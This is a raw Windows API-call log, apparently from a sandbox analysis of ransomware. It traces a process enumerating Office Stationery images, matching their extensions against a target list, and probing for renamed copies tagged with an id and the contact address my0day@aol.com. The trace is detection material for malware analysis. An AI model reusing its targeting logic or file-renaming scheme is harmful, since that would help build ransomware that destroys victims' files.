[0042.623] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.623] lstrlenW (lpString=".pdf") returned 4 [0042.623] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.623] lstrlenW (lpString=".xls") returned 4 [0042.623] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.623] lstrlenW (lpString=".xlsx") returned 5 [0042.623] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.623] lstrlenW (lpString=".ppt") returned 4 [0042.623] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.623] lstrlenW (lpString=".zip") returned 4 [0042.624] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString=".rar") returned 4 [0042.624] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString=".bz2") returned 4 [0042.624] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.624] lstrlenW (lpString=".7z") returned 3 [0042.624] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.624] lstrlenW (lpString=".dbf") returned 4 [0042.624] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.624] lstrlenW (lpString=".1cd") returned 4 [0042.624] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.624] lstrlenW (lpString=".jpg") returned 4 [0042.624] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.624] lstrlenW (lpString=".doc") returned 4 [0042.624] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.624] lstrlenW (lpString=".docx") returned 5 [0042.624] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.624] lstrlenW (lpString=".pdf") returned 4 [0042.624] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString=".xls") returned 4 [0042.624] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString=".xlsx") returned 5 [0042.624] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.624] lstrlenW (lpString=".ppt") returned 4 [0042.624] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.624] lstrlenW (lpString=".zip") returned 4 [0042.624] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.624] lstrlenW (lpString=".rar") returned 4 [0042.625] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.625] lstrlenW (lpString=".bz2") returned 4 [0042.625] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.625] lstrlenW (lpString=".7z") returned 3 [0042.625] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.625] lstrlenW (lpString=".dbf") returned 4 [0042.625] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.625] lstrlenW (lpString=".1cd") returned 4 [0042.625] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.625] lstrlenW (lpString=".jpg") returned 4 [0042.625] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.625] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.625] lstrlenW (lpString="Peacock.jpg") returned 11 [0042.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.626] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5115) returned 1 [0042.626] CloseHandle (hObject=0x174) returned 1 [0042.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0x20 [0042.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.626] lstrlenW (lpString=".doc") returned 4 [0042.626] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.626] lstrlenW (lpString=".docx") returned 5 [0042.626] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0042.626] lstrlenW (lpString=".pdf") returned 4 [0042.627] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.627] lstrlenW (lpString=".xls") returned 4 [0042.627] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.627] lstrlenW (lpString=".xlsx") returned 5 [0042.627] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0042.627] lstrlenW (lpString=".ppt") returned 4 [0042.627] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.627] lstrlenW (lpString=".zip") returned 4 [0042.627] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.627] lstrlenW (lpString=".rar") returned 4 [0042.627] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.627] lstrlenW (lpString=".bz2") returned 4 [0042.627] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.627] lstrlenW (lpString=".7z") returned 3 [0042.627] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.627] lstrlenW (lpString=".dbf") returned 4 [0042.627] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.627] lstrlenW (lpString=".1cd") returned 4 [0042.627] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.627] lstrlenW (lpString=".jpg") returned 4 [0042.627] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.627] lstrlenW (lpString=".doc") returned 4 [0042.627] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.627] lstrlenW (lpString=".docx") returned 5 [0042.627] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0042.627] lstrlenW (lpString=".pdf") returned 4 [0042.627] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.628] lstrlenW (lpString=".xls") returned 4 [0042.628] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.628] lstrlenW (lpString=".xlsx") returned 5 [0042.628] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0042.628] lstrlenW (lpString=".ppt") returned 4 [0042.628] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.628] lstrlenW (lpString=".zip") returned 4 [0042.628] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.628] lstrlenW (lpString=".rar") returned 4 [0042.628] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.628] lstrlenW (lpString=".bz2") returned 4 [0042.628] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.628] lstrlenW (lpString=".7z") returned 3 [0042.628] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.628] lstrlenW (lpString=".dbf") returned 4 [0042.628] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.628] lstrlenW (lpString=".1cd") returned 4 [0042.628] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 69 [0042.628] lstrlenW (lpString=".jpg") returned 4 [0042.628] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.628] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.628] lstrlenW (lpString="Pine_Lumber.jpg") returned 15 [0042.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.629] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3981) returned 1 [0042.629] CloseHandle (hObject=0x174) returned 1 [0042.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg")) returned 0x20 [0042.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.629] lstrlenW (lpString=".doc") returned 4 [0042.629] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.629] lstrlenW (lpString=".docx") returned 5 [0042.629] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1 [0042.629] lstrlenW (lpString=".pdf") returned 4 [0042.629] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.629] lstrlenW (lpString=".xls") returned 4 [0042.629] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.629] lstrlenW (lpString=".xlsx") returned 5 [0042.629] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1 [0042.629] lstrlenW (lpString=".ppt") returned 4 [0042.629] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.629] lstrlenW (lpString=".zip") returned 4 [0042.629] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.629] lstrlenW (lpString=".rar") returned 4 [0042.629] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.629] lstrlenW (lpString=".bz2") returned 4 [0042.630] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.630] lstrlenW (lpString=".7z") returned 3 [0042.630] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.630] lstrlenW (lpString=".dbf") returned 4 [0042.630] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.630] lstrlenW (lpString=".1cd") returned 4 [0042.630] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.630] lstrlenW (lpString=".jpg") returned 4 [0042.630] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.630] lstrlenW (lpString=".doc") returned 4 [0042.630] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.630] lstrlenW (lpString=".docx") returned 5 [0042.630] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1 [0042.630] lstrlenW (lpString=".pdf") returned 4 [0042.630] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.630] lstrlenW (lpString=".xls") returned 4 [0042.630] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.630] lstrlenW (lpString=".xlsx") returned 5 [0042.630] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1 [0042.630] lstrlenW (lpString=".ppt") returned 4 [0042.630] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.630] lstrlenW (lpString=".zip") returned 4 [0042.630] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.630] lstrlenW (lpString=".rar") returned 4 [0042.630] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.630] lstrlenW (lpString=".bz2") returned 4 [0042.630] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.631] lstrlenW (lpString=".7z") returned 3 [0042.631] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.631] lstrlenW (lpString=".dbf") returned 4 [0042.631] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.631] lstrlenW (lpString=".1cd") returned 4 [0042.631] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0042.631] lstrlenW (lpString=".jpg") returned 4 [0042.631] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.631] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.631] lstrlenW (lpString="Pretty_Peacock.jpg") returned 18 [0042.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.631] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5115) returned 1 [0042.631] CloseHandle (hObject=0x174) returned 1 [0042.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg")) returned 0x20 [0042.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.632] lstrlenW (lpString=".doc") returned 4 [0042.632] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.632] lstrlenW (lpString=".docx") returned 5 [0042.632] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0042.632] lstrlenW (lpString=".pdf") returned 4 [0042.632] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.632] lstrlenW (lpString=".xls") returned 4 [0042.632] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.632] lstrlenW (lpString=".xlsx") returned 5 [0042.632] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0042.632] lstrlenW (lpString=".ppt") returned 4 [0042.632] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.632] lstrlenW (lpString=".zip") returned 4 [0042.632] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.632] lstrlenW (lpString=".rar") returned 4 [0042.632] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.632] lstrlenW (lpString=".bz2") returned 4 [0042.632] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.632] lstrlenW (lpString=".7z") returned 3 [0042.632] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.632] lstrlenW (lpString=".dbf") returned 4 [0042.632] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.632] lstrlenW (lpString=".1cd") returned 4 [0042.632] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.632] lstrlenW (lpString=".jpg") returned 4 [0042.632] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.633] lstrlenW (lpString=".doc") returned 4 [0042.633] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.633] lstrlenW (lpString=".docx") returned 5 [0042.633] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0042.633] lstrlenW (lpString=".pdf") returned 4 [0042.633] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.633] lstrlenW (lpString=".xls") returned 4 [0042.633] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.633] lstrlenW (lpString=".xlsx") returned 5 [0042.633] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0042.633] lstrlenW (lpString=".ppt") returned 4 [0042.633] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.633] lstrlenW (lpString=".zip") returned 4 [0042.633] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.633] lstrlenW (lpString=".rar") returned 4 [0042.633] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.633] lstrlenW (lpString=".bz2") returned 4 [0042.633] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.633] lstrlenW (lpString=".7z") returned 3 [0042.633] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.633] lstrlenW (lpString=".dbf") returned 4 [0042.633] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.633] lstrlenW (lpString=".1cd") returned 4 [0042.633] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0042.633] lstrlenW (lpString=".jpg") returned 4 [0042.633] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.634] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.634] lstrlenW (lpString="Psychedelic.jpg") returned 15 [0042.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.635] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=14049) returned 1 [0042.635] CloseHandle (hObject=0x174) returned 1 [0042.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg")) returned 0x20 [0042.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.635] lstrlenW (lpString=".doc") returned 4 [0042.635] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.635] lstrlenW (lpString=".docx") returned 5 [0042.635] lstrcmpiW (lpString1=".docx", lpString2="c.jpg") returned -1 [0042.635] lstrlenW (lpString=".pdf") returned 4 [0042.635] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.635] lstrlenW (lpString=".xls") returned 4 [0042.635] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.636] lstrlenW (lpString=".xlsx") returned 5 [0042.636] lstrcmpiW (lpString1=".xlsx", lpString2="c.jpg") returned -1 [0042.636] lstrlenW (lpString=".ppt") returned 4 [0042.636] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.636] lstrlenW (lpString=".zip") returned 4 [0042.636] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.636] lstrlenW (lpString=".rar") returned 4 [0042.636] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.636] lstrlenW (lpString=".bz2") returned 4 [0042.636] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.636] lstrlenW (lpString=".7z") returned 3 [0042.636] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.636] lstrlenW (lpString=".dbf") returned 4 [0042.636] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.636] lstrlenW (lpString=".1cd") returned 4 [0042.636] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.636] lstrlenW (lpString=".jpg") returned 4 [0042.636] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.636] lstrlenW (lpString=".doc") returned 4 [0042.636] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.636] lstrlenW (lpString=".docx") returned 5 [0042.636] lstrcmpiW (lpString1=".docx", lpString2="c.jpg") returned -1 [0042.636] lstrlenW (lpString=".pdf") returned 4 [0042.636] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.636] lstrlenW (lpString=".xls") returned 4 [0042.636] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.637] lstrlenW (lpString=".xlsx") returned 5 [0042.637] lstrcmpiW (lpString1=".xlsx", lpString2="c.jpg") returned -1 [0042.637] lstrlenW (lpString=".ppt") returned 4 [0042.637] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 